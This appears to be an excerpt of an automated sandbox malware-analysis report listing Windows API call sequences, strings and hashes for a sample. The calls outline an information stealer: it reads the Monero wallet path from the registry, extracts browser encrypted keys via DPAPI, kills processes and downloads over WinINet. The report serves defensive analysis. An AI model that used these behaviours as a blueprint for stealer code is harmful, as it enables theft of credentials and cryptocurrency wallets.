                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                • String ID: Password
                                • API String ID: 356768136-3434357891
                                • Opcode ID: b2b2afc7379e8df12ae423ab9b39368542bfb954a38445a6b6683550ea02966b
                                • Instruction ID: 504a6e83c171600968d25da01e75c5d4a38a8807e4390f2961708489045ee7a6
                                • Opcode Fuzzy Hash: b2b2afc7379e8df12ae423ab9b39368542bfb954a38445a6b6683550ea02966b
                                • Instruction Fuzzy Hash: 72712EB1D0021DAFDB10DF95DC84AEEB7B9FF45300F14456AE609A7200EA35AE85CF94
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A1135
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006A113C
                                • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 006A1159
                                • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 006A1173
                                • RegCloseKey.ADVAPI32(?), ref: 006A117D
                                Strings
                                • SOFTWARE\monero-project\monero-core, xrefs: 006A114F
                                • wallet_path, xrefs: 006A116D
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                • API String ID: 3225020163-4244082812
                                • Opcode ID: 6198e28d51a7ce2071d94b1b0c10c980dc68dc2d47eeb8687b0a93953a1b8db8
                                • Instruction ID: af0191bd66943c1d2d41183e755e25c110fd55a221d8e2bd68f07f9db2b21783
                                • Opcode Fuzzy Hash: 6198e28d51a7ce2071d94b1b0c10c980dc68dc2d47eeb8687b0a93953a1b8db8
                                • Instruction Fuzzy Hash: D1F01D75A41208FBE710ABA0AC4DEEA7B7DEB05715F100256FE05E6290EAB05E448BA0
                                APIs
                                • memcmp.MSVCRT(?,v20,00000003), ref: 006A9E04
                                • memcmp.MSVCRT(?,v10,00000003), ref: 006A9E42
                                • LocalAlloc.KERNEL32(00000040), ref: 006A9EA7
                                  • Part of subcall function 006C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006C71FE
                                • lstrcpy.KERNEL32(00000000,006D4C48), ref: 006A9FB2
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpymemcmp$AllocLocal
                                • String ID: @$v10$v20
                                • API String ID: 102826412-278772428
                                • Opcode ID: 5fc4f9ea3e056d7260cba251e0656d5be0fc52cfc4b97cafd8779aa45673e526
                                • Instruction ID: c082ccbe949225669918dc975f45df36906a93bc93209b2b8ced6e9998b13c93
                                • Opcode Fuzzy Hash: 5fc4f9ea3e056d7260cba251e0656d5be0fc52cfc4b97cafd8779aa45673e526
                                • Instruction Fuzzy Hash: 3251BD71A5020A9FCB10FF69DC45B9EB7A6EF06314F254069F949EB251DA70ED018FA0
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 006A565A
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006A5661
                                • InternetOpenA.WININET(006CCFEC,00000000,00000000,00000000,00000000), ref: 006A5677
                                • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 006A5692
                                • InternetReadFile.WININET(?,?,00000400,00000001), ref: 006A56BC
                                • memcpy.MSVCRT(00000000,?,00000001), ref: 006A56E1
                                • InternetCloseHandle.WININET(?), ref: 006A56FA
                                • InternetCloseHandle.WININET(00000000), ref: 006A5701
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                • String ID:
                                • API String ID: 1008454911-0
                                • Opcode ID: 529594fe4f19bc74408d8e7af91b602b32f0f714f078db2840996054fb3eae6e
                                • Instruction ID: bead559711b5e07f2ccef8811a33af95d5d56dd940949cdc8a39a7e514dea953
                                • Opcode Fuzzy Hash: 529594fe4f19bc74408d8e7af91b602b32f0f714f078db2840996054fb3eae6e
                                • Instruction Fuzzy Hash: 0A416A70A01605EFDB14DF54DC88FAAB7B6FF49310F1481AAE909AB2A0E7719D41CF94
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 006C4759
                                • Process32First.KERNEL32(00000000,00000128), ref: 006C4769
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006C477B
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006C479C
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 006C47AB
                                • CloseHandle.KERNEL32(00000000), ref: 006C47B2
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006C47C0
                                • CloseHandle.KERNEL32(00000000), ref: 006C47CB
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: 768e4cf090360f53391fe7c7981cd1c6e902832d9d91178d8c958d3c94b19bc2
                                • Instruction ID: c8b4e962b50a139c853c6c2a74bcfdeabd31548e77c446f49e4fe068c864488d
                                • Opcode Fuzzy Hash: 768e4cf090360f53391fe7c7981cd1c6e902832d9d91178d8c958d3c94b19bc2
                                • Instruction Fuzzy Hash: 7301B571602614ABE7209B60AC89FFA77BDFB08752F040286F949E1180EF748D808A70
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 006B8435
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B846C
                                • lstrlen.KERNEL32(00000000), ref: 006B84B2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B84E9
                                • lstrlen.KERNEL32(00000000), ref: 006B84FF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B852E
                                • StrCmpCA.SHLWAPI(00000000,006D4C3C), ref: 006B853E
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: a9ccf66133bc8b8f7ee5e10ff95869c6fe7db43a85c45cb0a6a3deba33c8b6c5
                                • Instruction ID: 5deaa271fe5c1fe370d640f5f37da11bbcbd07d603a7679ff4e774b8e3ad648b
                                • Opcode Fuzzy Hash: a9ccf66133bc8b8f7ee5e10ff95869c6fe7db43a85c45cb0a6a3deba33c8b6c5
                                • Instruction Fuzzy Hash: DF516CB25002029FCB64DF29D894A9BB7FAEF45700F148559E886DB355EF30ED81CB50
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 006C2925
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C292C
                                • RegOpenKeyExA.ADVAPI32(80000002,0132B970,00000000,00020119,006C28A9), ref: 006C294B
                                • RegQueryValueExA.ADVAPI32(006C28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 006C2965
                                • RegCloseKey.ADVAPI32(006C28A9), ref: 006C296F
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: a4070ec245061ae70b7c29920930f7f8f1066f16a4d5b5349e12796e279a1ff3
                                • Instruction ID: 6de5ee4227b7710964bd78d089730437cc7f83c8393b7870bd72e58705c42c08
                                • Opcode Fuzzy Hash: a4070ec245061ae70b7c29920930f7f8f1066f16a4d5b5349e12796e279a1ff3
                                • Instruction Fuzzy Hash: 9601BC75A01219ABD310DBA5AC59FFB7BBDFB48711F10019AFE85D7240EA3159048BA0
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 006C2895
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C289C
                                  • Part of subcall function 006C2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 006C2925
                                  • Part of subcall function 006C2910: RtlAllocateHeap.NTDLL(00000000), ref: 006C292C
                                  • Part of subcall function 006C2910: RegOpenKeyExA.ADVAPI32(80000002,0132B970,00000000,00020119,006C28A9), ref: 006C294B
                                  • Part of subcall function 006C2910: RegQueryValueExA.ADVAPI32(006C28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 006C2965
                                  • Part of subcall function 006C2910: RegCloseKey.ADVAPI32(006C28A9), ref: 006C296F
                                • RegOpenKeyExA.ADVAPI32(80000002,0132B970,00000000,00020119,006B9500), ref: 006C28D1
                                • RegQueryValueExA.ADVAPI32(006B9500,0133E950,00000000,00000000,00000000,000000FF), ref: 006C28EC
                                • RegCloseKey.ADVAPI32(006B9500), ref: 006C28F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: cc8f7125c290de144b40c04b82035a8d37fbb969e3430ffc3b44350690fc2365
                                • Instruction ID: c1a87da7cda4921280ae53734e4340dee29119d4b2555792c0a738285b8d23c4
                                • Opcode Fuzzy Hash: cc8f7125c290de144b40c04b82035a8d37fbb969e3430ffc3b44350690fc2365
                                • Instruction Fuzzy Hash: D201A271A02209FBD710ABA4AC49FBA7B7DFB44311F00025AFE08D2250DA709D4487A0
                                APIs
                                • LoadLibraryA.KERNEL32(?), ref: 006A723E
                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 006A7279
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006A7280
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 006A72C3
                                • HeapFree.KERNEL32(00000000), ref: 006A72CA
                                • GetProcAddress.KERNEL32(00000000,?), ref: 006A7329
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                • String ID:
                                • API String ID: 174687898-0
                                • Opcode ID: 69f5f31ca8700b8f6fe2db25d9f13950d6ca8a1cec8e84415ecefe54de04f4fc
                                • Instruction ID: ec16d57f91dd07488ae4bb48043133ef1278173adc97dc81fd4b20fefe68e684
                                • Opcode Fuzzy Hash: 69f5f31ca8700b8f6fe2db25d9f13950d6ca8a1cec8e84415ecefe54de04f4fc
                                • Instruction Fuzzy Hash: 1B414B71705606DBDB20DF69EC84BAAB3EAFB8A315F1445AAEC49C7340E631ED009B50
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 006A9CA8
                                • LocalAlloc.KERNEL32(00000040,?), ref: 006A9CDA
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 006A9D03
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocLocallstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2746078483-738592651
                                • Opcode ID: 1ab61dd52e9c1884ef6bba7e896854337b66b46d66f1a8cef00f63d28980ba9a
                                • Instruction ID: bb388bdc88e968dbdc8b8b32f0ae037e7dc927f90cde87180195703f0acb984a
                                • Opcode Fuzzy Hash: 1ab61dd52e9c1884ef6bba7e896854337b66b46d66f1a8cef00f63d28980ba9a
                                • Instruction Fuzzy Hash: 3141E671A0060A9BCB20FF79DC416EE7BB6EF42304F148568E915A7352EA30DD40CFA0
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006BEA24
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BEA53
                                • lstrcat.KERNEL32(?,00000000), ref: 006BEA61
                                • lstrcat.KERNEL32(?,006D1794), ref: 006BEA7A
                                • lstrcat.KERNEL32(?,013393F8), ref: 006BEA8D
                                • lstrcat.KERNEL32(?,006D1794), ref: 006BEA9F
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
